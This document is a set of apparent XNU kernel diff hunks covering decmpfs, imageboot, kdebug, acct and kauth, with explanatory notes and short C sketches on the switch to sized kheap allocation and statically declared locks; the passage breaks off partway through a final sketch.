@@ -1654,6 +1580,7 @@ decmpfs_read_compressed(struct vnop_read_args *ap, int *is_compressed, decmpfs_c
        upl_t upl                    = NULL;
        upl_page_info_t *pli         = NULL;
        decmpfs_header *hdr          = NULL;
+       size_t alloc_size            = 0;
        uint64_t cachedSize          = 0;
        off_t uioPos                 = 0;
        user_ssize_t uioRemaining    = 0;
@@ -1694,7 +1621,7 @@ decmpfs_read_compressed(struct vnop_read_args *ap, int *is_compressed, decmpfs_c
                goto out;
        }
 
-       err = decmpfs_fetch_compressed_header(vp, cp, &hdr, 0);
+       err = decmpfs_fetch_compressed_header(vp, cp, &hdr, 0, &alloc_size);
        if (err != 0) {
                goto out;
        }
@@ -1709,14 +1636,14 @@ decmpfs_read_compressed(struct vnop_read_args *ap, int *is_compressed, decmpfs_c
        DebugLogWithPath("uplPos %lld uplSize %lld\n", (uint64_t)uplPos, (uint64_t)uplSize);
 #endif
 
-       lck_rw_lock_shared(decompressorsLock);
+       lck_rw_lock_shared(&decompressorsLock);
        decmpfs_adjust_fetch_region_func adjust_fetch = decmp_get_func(vp, hdr->compression_type, adjust_fetch);
        if (adjust_fetch) {
                /* give the compressor a chance to adjust the portion of the file that we read */
                adjust_fetch(vp, decmpfs_ctx, hdr, &uplPos, &uplSize);
                VerboseLogWithPath("adjusted uplPos %lld uplSize %lld\n", (uint64_t)uplPos, (uint64_t)uplSize);
        }
-       lck_rw_unlock_shared(decompressorsLock);
+       lck_rw_unlock_shared(&decompressorsLock);
 
        /* clip the adjusted size to the size of the file */
        if ((uint64_t)uplPos + uplSize > cachedSize) {
@@ -1791,10 +1718,9 @@ decmpfs_read_compressed(struct vnop_read_args *ap, int *is_compressed, decmpfs_c
                if (kr != KERN_SUCCESS) {
                        commit_upl(upl, 0, curUplSize, UPL_ABORT_FREE_ON_EMPTY, 1);
 #if 0
-                       char *path;
-                       MALLOC(path, char *, PATH_MAX, M_TEMP, M_WAITOK);
+                       char *path = zalloc(ZV_NAMEI);
                        panic("%s: decmpfs_read_compressed: ubc_upl_map error %d", vnpath(vp, path, PATH_MAX), (int)kr);
-                       FREE(path, M_TEMP);
+                       zfree(ZV_NAMEI, path);
 #else /* 0 */
                        ErrorLogWithPath("ubc_upl_map kr=0x%x\n", (int)kr);
 #endif /* 0 */
@@ -1901,8 +1827,8 @@ decompress:
 
 out:
 
-       if (hdr) {
-               FREE(hdr, M_TEMP);
+       if (hdr != NULL) {
+               kheap_free(KHEAP_TEMP, hdr, alloc_size);
        }
        if (cmpdata_locked) {
                decmpfs_unlock_compressed_data(cp, 0);
@@ -1929,6 +1855,7 @@ decmpfs_free_compressed_data(vnode_t vp, decmpfs_cnode *cp)
         *  then delete the file's compression xattr
         */
        decmpfs_header *hdr = NULL;
+       size_t alloc_size = 0;
 
        /*
         * Trace the following parameters on entry with event-id 0x03120010.
@@ -1937,11 +1864,11 @@ decmpfs_free_compressed_data(vnode_t vp, decmpfs_cnode *cp)
         */
        DECMPFS_EMIT_TRACE_ENTRY(DECMPDBG_FREE_COMPRESSED_DATA, vp->v_id);
 
-       int err = decmpfs_fetch_compressed_header(vp, cp, &hdr, 0);
+       int err = decmpfs_fetch_compressed_header(vp, cp, &hdr, 0, &alloc_size);
        if (err) {
                ErrorLogWithPath("decmpfs_fetch_compressed_header err %d\n", err);
        } else {
-               lck_rw_lock_shared(decompressorsLock);
+               lck_rw_lock_shared(&decompressorsLock);
                decmpfs_free_compressed_data_func free_data = decmp_get_func(vp, hdr->compression_type, free_data);
                if (free_data) {
                        err = free_data(vp, decmpfs_ctx, hdr);
@@ -1949,7 +1876,7 @@ decmpfs_free_compressed_data(vnode_t vp, decmpfs_cnode *cp)
                        /* nothing to do, so no error */
                        err = 0;
                }
-               lck_rw_unlock_shared(decompressorsLock);
+               lck_rw_unlock_shared(&decompressorsLock);
 
                if (err != 0) {
                        ErrorLogWithPath("decompressor err %d\n", err);
@@ -1965,13 +1892,9 @@ decmpfs_free_compressed_data(vnode_t vp, decmpfs_cnode *cp)
 
        /* delete the xattr */
        err = vn_removexattr(vp, DECMPFS_XATTR_NAME, 0, decmpfs_ctx);
-       if (err != 0) {
-               goto out;
-       }
 
-out:
-       if (hdr) {
-               FREE(hdr, M_TEMP);
+       if (hdr != NULL) {
+               kheap_free(KHEAP_TEMP, hdr, alloc_size);
        }
        return err;
 }
@@ -2018,6 +1941,7 @@ decmpfs_decompress_file(vnode_t vp, decmpfs_cnode *cp, off_t toSize, int truncat
        int update_file_state        = 0;
        size_t allocSize             = 0;
        decmpfs_header *hdr          = NULL;
+       size_t hdr_size              = 0;
        int cmpdata_locked           = 0;
        off_t remaining              = 0;
        uint64_t uncompressed_size   = 0;
@@ -2077,7 +2001,7 @@ decompress:
        }
        }
 
-       err = decmpfs_fetch_compressed_header(vp, cp, &hdr, 0);
+       err = decmpfs_fetch_compressed_header(vp, cp, &hdr, 0, &hdr_size);
        if (err != 0) {
                goto out;
        }
@@ -2096,7 +2020,7 @@ decompress:
        }
 
        allocSize = MIN(64 * 1024, (size_t)toSize);
-       MALLOC(data, char *, allocSize, M_TEMP, M_WAITOK);
+       data = kheap_alloc(KHEAP_TEMP, allocSize, Z_WAITOK);
        if (!data) {
                err = ENOMEM;
                goto out;
@@ -2210,12 +2134,10 @@ nodecmp:
 #endif
 
 out:
-       if (hdr) {
-               FREE(hdr, M_TEMP);
-       }
-       if (data) {
-               FREE(data, M_TEMP);
+       if (hdr != NULL) {
+               kheap_free(KHEAP_TEMP, hdr, hdr_size);
        }
+       kheap_free(KHEAP_TEMP, data, allocSize);
        if (uio_w) {
                uio_free(uio_w);
        }
@@ -2231,10 +2153,10 @@ out:
        }
 
        if (update_file_state) {
-               lck_mtx_lock(decompress_channel_mtx);
+               lck_mtx_lock(&decompress_channel_mtx);
                decmpfs_cnode_set_vnode_state(cp, new_state, 1);
                wakeup((caddr_t)&decompress_channel); /* wake up anyone who might have been waiting for decompression */
-               lck_mtx_unlock(decompress_channel_mtx);
+               lck_mtx_unlock(&decompress_channel_mtx);
        }
 
        if (cmpdata_locked) {
@@ -2318,7 +2240,7 @@ SECURITY_READ_ONLY_EARLY(static decmpfs_registration) Type1Reg =
 #pragma mark --- decmpfs initialization ---
 
 void
-decmpfs_init()
+decmpfs_init(void)
 {
        static int done = 0;
        if (done) {
@@ -2327,12 +2249,6 @@ decmpfs_init()
 
        decmpfs_ctx = vfs_context_create(vfs_context_kernel());
 
-       lck_grp_attr_t *attr = lck_grp_attr_alloc_init();
-       decmpfs_lockgrp = lck_grp_alloc_init("VFSCOMP", attr);
-       lck_grp_attr_free(attr);
-       decompressorsLock = lck_rw_alloc_init(decmpfs_lockgrp, NULL);
-       decompress_channel_mtx = lck_mtx_alloc_init(decmpfs_lockgrp, NULL);
-
        register_decmpfs_decompressor(CMP_Type1, &Type1Reg);
 
        done = 1;
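A pattern that repeats throughout the decmpfs hunks: kheap_free() wants the size that was allocated, so decmpfs_fetch_compressed_header() now reports its allocation size and every caller threads that value through to the free. The following kernel-side sketch shows that contract in miniature; the example_* names are illustrative and not from the commit.

#include <sys/types.h>
#include <sys/errno.h>
#include <kern/kalloc.h>

static int
example_fetch(void **out, size_t *out_size, size_t want)
{
	size_t alloc_size = want;
	void *buf = kheap_alloc(KHEAP_TEMP, alloc_size, Z_WAITOK | Z_ZERO);

	if (buf == NULL) {
		return ENOMEM;
	}
	*out = buf;
	*out_size = alloc_size; /* the caller hands this back to kheap_free() */
	return 0;
}

static void
example_release(void *buf, size_t alloc_size)
{
	/* as in the hunks above, no NULL check is needed before kheap_free() */
	kheap_free(KHEAP_TEMP, buf, alloc_size);
}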
index 36a275c68e36e75b22b4c0fc89f3bd9a1b4dd0fd..1672c8f1fb2964493d79b05fa71f479c938116ad 100644 (file)
@@ -91,7 +91,7 @@ static boolean_t imageboot_setup_new(imageboot_type_t type);
 
 void *ubc_getobject_from_filename(const char *filename, struct vnode **vpp, off_t *file_size);
 
-extern lck_rw_t rootvnode_rw_lock;
+extern lck_rw_t rootvnode_rw_lock;
 
 #define kIBFilePrefix "file://"
 
@@ -199,12 +199,12 @@ extern bool IOBaseSystemARVRootHashAvailable(void);
  * It will be mounted at mount_path.
  * The vfs_switch_root operation will be performed.
  * After the pivot, the outgoing root filesystem (the filesystem at root when
- * this function begins) will be at outgoing_root_path.  If `rooted_dmg` is true,
- * then ignore then chunklisted or authAPFS checks on this image
+ * this function begins) will be at outgoing_root_path.  If `skip_signature_check` is true,
+ * then ignore the chunklisted or authAPFS checks on this image
  */
 __private_extern__ int
 imageboot_pivot_image(const char *image_path, imageboot_type_t type, const char *mount_path,
-    const char *outgoing_root_path, const bool rooted_dmg)
+    const char *outgoing_root_path, const bool rooted_dmg, const bool skip_signature_check)
 {
        int error;
        boolean_t authenticated_dmg_chunklist = false;
@@ -324,8 +324,9 @@ imageboot_pivot_image(const char *image_path, imageboot_type_t type, const char
                /*
                 * If we are using a custom rooted DMG, or if we have already authenticated
                 * the DMG via chunklist, then it is permissible to use.
+                * Or, if CSR_ALLOW_ANY_RECOVERY_OS is set on a Development or Debug build variant.
                 */
-               if (rooted_dmg || authenticated_dmg_chunklist) {
+               if (rooted_dmg || authenticated_dmg_chunklist || skip_signature_check) {
                        rootauth = 0;
                }
                error = rootauth;
@@ -505,7 +506,7 @@ imageboot_mount_image(const char *root_path, int height, imageboot_type_t type)
        vnode_ref(newdp);
        vnode_put(newdp);
 
-       lck_rw_lock_exclusive(rootvnode_rw_lock);
+       lck_rw_lock_exclusive(&rootvnode_rw_lock);
        /* switch to the new rootvnode */
        if (update_rootvnode) {
                rootvnode = newdp;
@@ -518,7 +519,7 @@ imageboot_mount_image(const char *root_path, int height, imageboot_type_t type)
        mount_unlock(new_rootfs);
 
        filedesc0.fd_cdir = newdp;
-       lck_rw_unlock_exclusive(rootvnode_rw_lock);
+       lck_rw_unlock_exclusive(&rootvnode_rw_lock);
 
        DBG_TRACE("%s: root switched\n", __FUNCTION__);
 
@@ -696,6 +697,9 @@ imgboot_get_image_file(const char *path, off_t *fsize, int *errp)
        }
 
        if (err) {
+               if (vp) {
+                       vnode_put(vp);
+               }
                *errp = err;
                vp = NULL;
        }
@@ -843,15 +847,15 @@ imageboot_mount_ramdisk(const char *path)
 #endif
 
        /* ... and unmount everything */
-       vfs_unmountall();
+       vfs_unmountall(FALSE);
 
-       lck_rw_lock_exclusive(rootvnode_rw_lock);
+       lck_rw_lock_exclusive(&rootvnode_rw_lock);
        filedesc0.fd_cdir = NULL;
        tvp = rootvnode;
        rootvnode = NULL;
        rootvp = NULLVP;
        rootdev = NODEV;
-       lck_rw_unlock_exclusive(rootvnode_rw_lock);
+       lck_rw_unlock_exclusive(&rootvnode_rw_lock);
        vnode_get_and_drop_always(tvp);
 
        /* Attach the ramfs image ... */
@@ -876,7 +880,7 @@ imageboot_mount_ramdisk(const char *path)
        }
        vnode_ref(newdp);
 
-       lck_rw_lock_exclusive(rootvnode_rw_lock);
+       lck_rw_lock_exclusive(&rootvnode_rw_lock);
        rootvnode = newdp;
        rootvnode->v_flag |= VROOT;
        new_rootfs = rootvnode->v_mount;
@@ -887,7 +891,7 @@ imageboot_mount_ramdisk(const char *path)
        set_fake_bootuuid(new_rootfs);
 
        filedesc0.fd_cdir = newdp;
-       lck_rw_unlock_exclusive(rootvnode_rw_lock);
+       lck_rw_unlock_exclusive(&rootvnode_rw_lock);
 
        vnode_put(newdp);
 
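The small hunk in imgboot_get_image_file() plugs an iocount leak: when the lookup succeeds but a later check fails, the vnode reference has to be released before the error is reported. Below is a hedged sketch of that error-path discipline using the public vnode KPI; the function and its name are illustrative, not part of the commit.

#include <sys/errno.h>
#include <sys/vnode.h>

static int
example_open_regular(const char *path, vnode_t *vpp, vfs_context_t ctx)
{
	vnode_t vp = NULLVP;
	int err = vnode_lookup(path, 0, &vp, ctx);

	if (err == 0 && vnode_vtype(vp) != VREG) {
		/* mirror the fix above: drop the iocount before failing */
		vnode_put(vp);
		vp = NULLVP;
		err = EINVAL;
	}
	*vpp = vp;
	return err;
}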
index f0ca4b75c881484ed2ab0605c3970eee207ed69a..2d3de0289e39c5799288f094211dc29d9ab1c273 100644 (file)
@@ -440,8 +440,9 @@ unsigned int kdlog_value2 = 0;
 unsigned int kdlog_value3 = 0;
 unsigned int kdlog_value4 = 0;
 
-static lck_spin_t * kdw_spin_lock;
-static lck_spin_t * kds_spin_lock;
+static LCK_GRP_DECLARE(kdebug_lck_grp, "kdebug");
+static LCK_SPIN_DECLARE(kdw_spin_lock, &kdebug_lck_grp);
+static LCK_SPIN_DECLARE(kds_spin_lock, &kdebug_lck_grp);
 
 kd_threadmap *kd_mapptr = 0;
 vm_size_t kd_mapsize = 0;
@@ -665,8 +666,6 @@ kdbg_iop_list_callback(kd_iop_t* iop, kd_callback_type type, void* arg)
        }
 }
 
-static lck_grp_t *kdebug_lck_grp = NULL;
-
 static void
 kdbg_set_tracing_enabled(bool enabled, uint32_t trace_type)
 {
@@ -679,7 +678,7 @@ kdbg_set_tracing_enabled(bool enabled, uint32_t trace_type)
            NULL);
 
        int s = ml_set_interrupts_enabled(false);
-       lck_spin_lock_grp(kds_spin_lock, kdebug_lck_grp);
+       lck_spin_lock_grp(&kds_spin_lock, &kdebug_lck_grp);
 
        if (enabled) {
                /*
@@ -696,7 +695,7 @@ kdbg_set_tracing_enabled(bool enabled, uint32_t trace_type)
                kd_ctrl_page.enabled = 0;
                commpage_update_kdebug_state();
        }
-       lck_spin_unlock(kds_spin_lock);
+       lck_spin_unlock(&kds_spin_lock);
        ml_set_interrupts_enabled(s);
 
        if (enabled) {
@@ -712,7 +711,7 @@ static void
 kdbg_set_flags(int slowflag, int enableflag, bool enabled)
 {
        int s = ml_set_interrupts_enabled(false);
-       lck_spin_lock_grp(kds_spin_lock, kdebug_lck_grp);
+       lck_spin_lock_grp(&kds_spin_lock, &kdebug_lck_grp);
 
        if (enabled) {
                kd_ctrl_page.kdebug_slowcheck |= slowflag;
@@ -722,7 +721,7 @@ kdbg_set_flags(int slowflag, int enableflag, bool enabled)
                kdebug_enable &= ~enableflag;
        }
 
-       lck_spin_unlock(kds_spin_lock);
+       lck_spin_unlock(&kds_spin_lock);
        ml_set_interrupts_enabled(s);
 }
 
@@ -734,7 +733,7 @@ disable_wrap(uint32_t *old_slowcheck, uint32_t *old_flags)
 {
        bool wrapped;
        int s = ml_set_interrupts_enabled(false);
-       lck_spin_lock_grp(kds_spin_lock, kdebug_lck_grp);
+       lck_spin_lock_grp(&kds_spin_lock, &kdebug_lck_grp);
 
        *old_slowcheck = kd_ctrl_page.kdebug_slowcheck;
        *old_flags = kd_ctrl_page.kdebug_flags;
@@ -743,7 +742,7 @@ disable_wrap(uint32_t *old_slowcheck, uint32_t *old_flags)
        kd_ctrl_page.kdebug_flags &= ~KDBG_WRAPPED;
        kd_ctrl_page.kdebug_flags |= KDBG_NOWRAP;
 
-       lck_spin_unlock(kds_spin_lock);
+       lck_spin_unlock(&kds_spin_lock);
        ml_set_interrupts_enabled(s);
 
        return wrapped;
@@ -753,7 +752,7 @@ static void
 enable_wrap(uint32_t old_slowcheck)
 {
        int s = ml_set_interrupts_enabled(false);
-       lck_spin_lock_grp(kds_spin_lock, kdebug_lck_grp);
+       lck_spin_lock_grp(&kds_spin_lock, &kdebug_lck_grp);
 
        kd_ctrl_page.kdebug_flags &= ~KDBG_NOWRAP;
 
@@ -761,7 +760,7 @@ enable_wrap(uint32_t old_slowcheck)
                kd_ctrl_page.kdebug_slowcheck &= ~SLOW_NOLOG;
        }
 
-       lck_spin_unlock(kds_spin_lock);
+       lck_spin_unlock(&kds_spin_lock);
        ml_set_interrupts_enabled(s);
 }
 
@@ -935,7 +934,7 @@ release_storage_unit(int cpu, uint32_t kdsp_raw)
        kdsp.raw = kdsp_raw;
 
        s = ml_set_interrupts_enabled(false);
-       lck_spin_lock_grp(kds_spin_lock, kdebug_lck_grp);
+       lck_spin_lock_grp(&kds_spin_lock, &kdebug_lck_grp);
 
        kdbp = &kdbip[cpu];
 
@@ -958,7 +957,7 @@ release_storage_unit(int cpu, uint32_t kdsp_raw)
 
                kd_ctrl_page.kds_inuse_count--;
        }
-       lck_spin_unlock(kds_spin_lock);
+       lck_spin_unlock(&kds_spin_lock);
        ml_set_interrupts_enabled(s);
 }
 
@@ -973,7 +972,7 @@ allocate_storage_unit(int cpu)
        int s = 0;
 
        s = ml_set_interrupts_enabled(false);
-       lck_spin_lock_grp(kds_spin_lock, kdebug_lck_grp);
+       lck_spin_lock_grp(&kds_spin_lock, &kdebug_lck_grp);
 
        kdbp = &kdbip[cpu];
 
@@ -1081,7 +1080,7 @@ allocate_storage_unit(int cpu)
        }
        kdbp->kd_list_tail = kdsp;
 out:
-       lck_spin_unlock(kds_spin_lock);
+       lck_spin_unlock(&kds_spin_lock);
        ml_set_interrupts_enabled(s);
 
        return retval;
@@ -2066,27 +2065,6 @@ kdebug_trace_string(__unused struct proc *p,
        return 0;
 }
 
-static void
-kdbg_lock_init(void)
-{
-       static lck_grp_attr_t *kdebug_lck_grp_attr = NULL;
-       static lck_attr_t     *kdebug_lck_attr     = NULL;
-
-       if (kd_ctrl_page.kdebug_flags & KDBG_LOCKINIT) {
-               return;
-       }
-
-       assert(kdebug_lck_grp_attr == NULL);
-       kdebug_lck_grp_attr = lck_grp_attr_alloc_init();
-       kdebug_lck_grp = lck_grp_alloc_init("kdebug", kdebug_lck_grp_attr);
-       kdebug_lck_attr = lck_attr_alloc_init();
-
-       kds_spin_lock = lck_spin_alloc_init(kdebug_lck_grp, kdebug_lck_attr);
-       kdw_spin_lock = lck_spin_alloc_init(kdebug_lck_grp, kdebug_lck_attr);
-
-       kd_ctrl_page.kdebug_flags |= KDBG_LOCKINIT;
-}
-
 int
 kdbg_bootstrap(bool early_trace)
 {
@@ -2425,8 +2403,6 @@ kdebug_reset(void)
 {
        ktrace_assert_lock_held();
 
-       kdbg_lock_init();
-
        kdbg_clear();
        if (kdbg_typefilter) {
                typefilter_reject_all(kdbg_typefilter);
@@ -3354,7 +3330,7 @@ kdbg_wait(uint64_t timeout_ms, bool locked_wait)
        if (!s) {
                panic("kdbg_wait() called with interrupts disabled");
        }
-       lck_spin_lock_grp(kdw_spin_lock, kdebug_lck_grp);
+       lck_spin_lock_grp(&kdw_spin_lock, &kdebug_lck_grp);
 
        if (!locked_wait) {
                /* drop the mutex to allow others to access trace */
@@ -3366,9 +3342,9 @@ kdbg_wait(uint64_t timeout_ms, bool locked_wait)
                kds_waiter = 1;
 
                if (abstime) {
-                       wait_result = lck_spin_sleep_deadline(kdw_spin_lock, 0, &kds_waiter, THREAD_ABORTSAFE, abstime);
+                       wait_result = lck_spin_sleep_deadline(&kdw_spin_lock, 0, &kds_waiter, THREAD_ABORTSAFE, abstime);
                } else {
-                       wait_result = lck_spin_sleep(kdw_spin_lock, 0, &kds_waiter, THREAD_ABORTSAFE);
+                       wait_result = lck_spin_sleep(&kdw_spin_lock, 0, &kds_waiter, THREAD_ABORTSAFE);
                }
 
                kds_waiter = 0;
@@ -3377,7 +3353,7 @@ kdbg_wait(uint64_t timeout_ms, bool locked_wait)
        /* check the count under the spinlock */
        bool threshold_exceeded = (kd_ctrl_page.kds_inuse_count >= n_storage_threshold);
 
-       lck_spin_unlock(kdw_spin_lock);
+       lck_spin_unlock(&kdw_spin_lock);
        ml_set_interrupts_enabled(s);
 
        if (!locked_wait) {
@@ -3408,13 +3384,13 @@ kdbg_wakeup(void)
         */
        bool s = ml_set_interrupts_enabled(false);
 
-       if (lck_spin_try_lock(kdw_spin_lock)) {
+       if (lck_spin_try_lock(&kdw_spin_lock)) {
                if (kds_waiter &&
                    (kd_ctrl_page.kds_inuse_count >= n_storage_threshold)) {
                        kds_waiter = 0;
                        need_kds_wakeup = true;
                }
-               lck_spin_unlock(kdw_spin_lock);
+               lck_spin_unlock(&kdw_spin_lock);
        }
 
        ml_set_interrupts_enabled(s);
@@ -3448,9 +3424,6 @@ kdbg_control(int *name, u_int namelen, user_addr_t where, size_t *sizep)
                value = name[1];
        }
 
-       kdbg_lock_init();
-       assert(kd_ctrl_page.kdebug_flags & KDBG_LOCKINIT);
-
        ktrace_lock();
 
        /*
@@ -4282,8 +4255,6 @@ kdebug_trace_start(unsigned int n_events, const char *filter_desc,
 
        ktrace_start_single_threaded();
 
-       kdbg_lock_init();
-
        ktrace_kernel_configure(KTRACE_KDEBUG);
 
        kdbg_set_nkdbufs(n_events);
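kdebug's spin locks move from kdbg_lock_init()-time allocation to link-time LCK_SPIN_DECLARE objects, which is why the KDBG_LOCKINIT dance disappears; the interrupts-off discipline around each hold is unchanged. A minimal sketch of that pattern follows, using illustrative example_* names rather than anything from the commit.

#include <stdint.h>
#include <kern/locks.h>
#include <machine/machine_routines.h>

static LCK_GRP_DECLARE(example_grp, "example");
static LCK_SPIN_DECLARE(example_spin, &example_grp);

static uint32_t example_flags;

static void
example_set_flag(uint32_t flag)
{
	/* interrupts stay disabled for the whole spinlock hold, as in the hunks above */
	boolean_t s = ml_set_interrupts_enabled(FALSE);

	lck_spin_lock_grp(&example_spin, &example_grp);
	example_flags |= flag;
	lck_spin_unlock(&example_spin);
	ml_set_interrupts_enabled(s);
}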
index fd3172f7f0f28ab023e1eb794c5d10ec01f1ef1c..3f662a9791a449bd79977731737277ac3f73b778 100644 (file)
  */
 comp_t  encode_comp_t(uint32_t, uint32_t);
 void    acctwatch(void *);
-void    acct_init(void);
 
 /*
  * Accounting vnode pointer, and suspended accounting vnode pointer.  States
@@ -139,18 +138,11 @@ int     acctresume = 4;         /* resume when free space risen to > 4% */
 int     acctchkfreq = 15;       /* frequency (in seconds) to check space */
 
 
-static lck_grp_t       *acct_subsys_lck_grp;
-static lck_mtx_t       *acct_subsys_mutex;
+static LCK_GRP_DECLARE(acct_subsys_lck_grp, "acct");
+static LCK_MTX_DECLARE(acct_subsys_mutex, &acct_subsys_lck_grp);
 
-#define ACCT_SUBSYS_LOCK() lck_mtx_lock(acct_subsys_mutex)
-#define ACCT_SUBSYS_UNLOCK() lck_mtx_unlock(acct_subsys_mutex)
-
-void
-acct_init(void)
-{
-       acct_subsys_lck_grp = lck_grp_alloc_init("acct", NULL);
-       acct_subsys_mutex = lck_mtx_alloc_init(acct_subsys_lck_grp, NULL);
-}
+#define ACCT_SUBSYS_LOCK() lck_mtx_lock(&acct_subsys_mutex)
+#define ACCT_SUBSYS_UNLOCK() lck_mtx_unlock(&acct_subsys_mutex)
 
 
 /*
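The accounting subsystem follows the same recipe: the lock group and mutex become LCK_GRP_DECLARE/LCK_MTX_DECLARE statics, so the dedicated acct_init() routine disappears. A minimal sketch of the declare-and-use shape, with illustrative example_* names:

#include <kern/locks.h>

static LCK_GRP_DECLARE(example_grp, "example");
static LCK_MTX_DECLARE(example_mtx, &example_grp);

#define EXAMPLE_LOCK()   lck_mtx_lock(&example_mtx)
#define EXAMPLE_UNLOCK() lck_mtx_unlock(&example_mtx)

static int example_count;

static void
example_bump(void)
{
	/* no *_init() routine is needed; the lock exists from link time */
	EXAMPLE_LOCK();
	example_count++;
	EXAMPLE_UNLOCK();
}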
index 0181ee93de8d2c4a120183cacb21675835dad8e4..a36bc6a51f3bc9c844f48660f5030da51a301116 100644 (file)
  * Authorization scopes.
  */
 
-lck_grp_t *kauth_lck_grp;
-static lck_mtx_t *kauth_scope_mtx;
-#define KAUTH_SCOPELOCK()       lck_mtx_lock(kauth_scope_mtx);
-#define KAUTH_SCOPEUNLOCK()     lck_mtx_unlock(kauth_scope_mtx);
+LCK_GRP_DECLARE(kauth_lck_grp, "kauth");
+static LCK_MTX_DECLARE(kauth_scope_mtx, &kauth_lck_grp);
+#define KAUTH_SCOPELOCK()       lck_mtx_lock(&kauth_scope_mtx);
+#define KAUTH_SCOPEUNLOCK()     lck_mtx_unlock(&kauth_scope_mtx);
 
 /*
  * We support listeners for scopes that have not been registered yet.
@@ -92,7 +92,8 @@ struct kauth_local_listener {
 };
 typedef struct kauth_local_listener *kauth_local_listener_t;
 
-static TAILQ_HEAD(, kauth_listener) kauth_dangling_listeners;
+static TAILQ_HEAD(, kauth_listener) kauth_dangling_listeners =
+    TAILQ_HEAD_INITIALIZER(kauth_dangling_listeners);
 
 /*
  * Scope listeners need to be reworked to be dynamic.
@@ -114,7 +115,7 @@ struct kauth_scope {
 /* values for kauth_scope.ks_flags */
 #define KS_F_HAS_LISTENERS              (1 << 0)
 
-static TAILQ_HEAD(, kauth_scope) kauth_scopes;
+static TAILQ_HEAD(, kauth_scope) kauth_scopes = TAILQ_HEAD_INITIALIZER(kauth_scopes);
 
 static int kauth_add_callback_to_scope(kauth_scope_t sp, kauth_listener_t klp);
 static void     kauth_scope_init(void);
@@ -142,35 +143,14 @@ extern void             release_pathbuff(char *path);
 void
 kauth_init(void)
 {
-       lck_grp_attr_t  *grp_attributes;
-
-       TAILQ_INIT(&kauth_scopes);
-       TAILQ_INIT(&kauth_dangling_listeners);
-
-       /* set up our lock group */
-       grp_attributes = lck_grp_attr_alloc_init();
-       kauth_lck_grp = lck_grp_alloc_init("kauth", grp_attributes);
-       lck_grp_attr_free(grp_attributes);
-
        /* bring up kauth subsystem components */
        kauth_cred_init();
-#if CONFIG_EXT_RESOLVER
-       kauth_identity_init();
-       kauth_groups_init();
-#endif
        kauth_scope_init();
-#if CONFIG_EXT_RESOLVER
-       kauth_resolver_init();
-#endif
-       /* can't alloc locks after this */
-       lck_grp_free(kauth_lck_grp);
-       kauth_lck_grp = NULL;
 }
 
 static void
 kauth_scope_init(void)
 {
-       kauth_scope_mtx = lck_mtx_alloc_init(kauth_lck_grp, 0 /*LCK_ATTR_NULL*/);
        kauth_scope_process = kauth_register_scope(KAUTH_SCOPE_PROCESS, kauth_authorize_process_callback, NULL);
        kauth_scope_generic = kauth_register_scope(KAUTH_SCOPE_GENERIC, kauth_authorize_generic_callback, NULL);
        kauth_scope_fileop = kauth_register_scope(KAUTH_SCOPE_FILEOP, NULL, NULL);
@@ -188,7 +168,7 @@ kauth_alloc_scope(const char *identifier, kauth_scope_callback_t callback, void
        /*
         * Allocate and populate the scope structure.
         */
-       MALLOC(sp, kauth_scope_t, sizeof(*sp), M_KAUTH, M_WAITOK | M_ZERO);
+       sp = kheap_alloc(KM_KAUTH, sizeof(*sp), Z_WAITOK | Z_ZERO);
        if (sp == NULL) {
                return NULL;
        }
@@ -207,7 +187,7 @@ kauth_alloc_listener(const char *identifier, kauth_scope_callback_t callback, vo
        /*
         * Allocate and populate the listener structure.
         */
-       MALLOC(lsp, kauth_listener_t, sizeof(*lsp), M_KAUTH, M_WAITOK);
+       lsp = kheap_alloc(KM_KAUTH, sizeof(*lsp), Z_WAITOK);
        if (lsp == NULL) {
                return NULL;
        }
@@ -236,7 +216,7 @@ kauth_register_scope(const char *identifier, kauth_scope_callback_t callback, vo
                if (strncmp(tsp->ks_identifier, identifier,
                    strlen(tsp->ks_identifier) + 1) == 0) {
                        KAUTH_SCOPEUNLOCK();
-                       FREE(sp, M_KAUTH);
+                       kheap_free(KM_KAUTH, sp, sizeof(struct kauth_scope));
                        return NULL;
                }
        }
@@ -294,7 +274,7 @@ kauth_deregister_scope(kauth_scope_t scope)
                }
        }
        KAUTH_SCOPEUNLOCK();
-       FREE(scope, M_KAUTH);
+       kheap_free(KM_KAUTH, scope, sizeof(struct kauth_scope));
 
        return;
 }
@@ -323,7 +303,7 @@ kauth_listen_scope(const char *identifier, kauth_scope_callback_t callback, void
                        }
                        /* table already full */
                        KAUTH_SCOPEUNLOCK();
-                       FREE(klp, M_KAUTH);
+                       kheap_free(KM_KAUTH, klp, sizeof(struct kauth_listener));
                        return NULL;
                }
        }
@@ -367,7 +347,7 @@ kauth_unlisten_scope(kauth_listener_t listener)
                                        sp->ks_flags &= ~KS_F_HAS_LISTENERS;
                                }
                                KAUTH_SCOPEUNLOCK();
-                               FREE(listener, M_KAUTH);
+                               kheap_free(KM_KAUTH, listener, sizeof(struct kauth_listener));
                                return;
                        }
                }
@@ -378,7 +358,7 @@ kauth_unlisten_scope(kauth_listener_t listener)
                if (klp == listener) {
                        TAILQ_REMOVE(&kauth_dangling_listeners, klp, kl_link);
                        KAUTH_SCOPEUNLOCK();
-                       FREE(listener, M_KAUTH);
+                       kheap_free(KM_KAUTH, listener, sizeof(struct kauth_listener));
                        return;
                }
        }
@@ -1084,7 +1064,7 @@ kauth_filesec_alloc(int count)
                return NULL;
        }
 
-       MALLOC(fsp, kauth_filesec_t, KAUTH_FILESEC_SIZE(count), M_KAUTH, M_WAITOK);
+       fsp = kheap_alloc(KM_KAUTH, KAUTH_FILESEC_SIZE(count), Z_WAITOK);
        if (fsp != NULL) {
                fsp->fsec_magic = KAUTH_FILESEC_MAGIC;
                fsp->fsec_owner = kauth_null_guid;
@@ -1118,7 +1098,7 @@ kauth_filesec_free(kauth_filesec_t fsp)
                panic("freeing KAUTH_FILESEC_WANTED");
        }
 #endif
-       FREE(fsp, M_KAUTH);
+       kheap_free_addr(KM_KAUTH, fsp);
 }
 
 /*
@@ -1206,7 +1186,7 @@ kauth_acl_alloc(int count)
                return NULL;
        }
 
-       MALLOC(aclp, kauth_acl_t, KAUTH_ACL_SIZE(count), M_KAUTH, M_WAITOK);
+       aclp = kheap_alloc(KM_KAUTH, KAUTH_ACL_SIZE(count), Z_WAITOK);
        if (aclp != NULL) {
                aclp->acl_entrycount = 0;
                aclp->acl_flags = 0;
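Besides moving kauth allocations onto the KM_KAUTH heap, the hunks above also initialize the scope and dangling-listener lists statically with TAILQ_HEAD_INITIALIZER instead of calling TAILQ_INIT() from kauth_init(). A small sketch of that idiom, with illustrative names not taken from the commit:

#include <sys/queue.h>

struct example_node {
	TAILQ_ENTRY(example_node) link;
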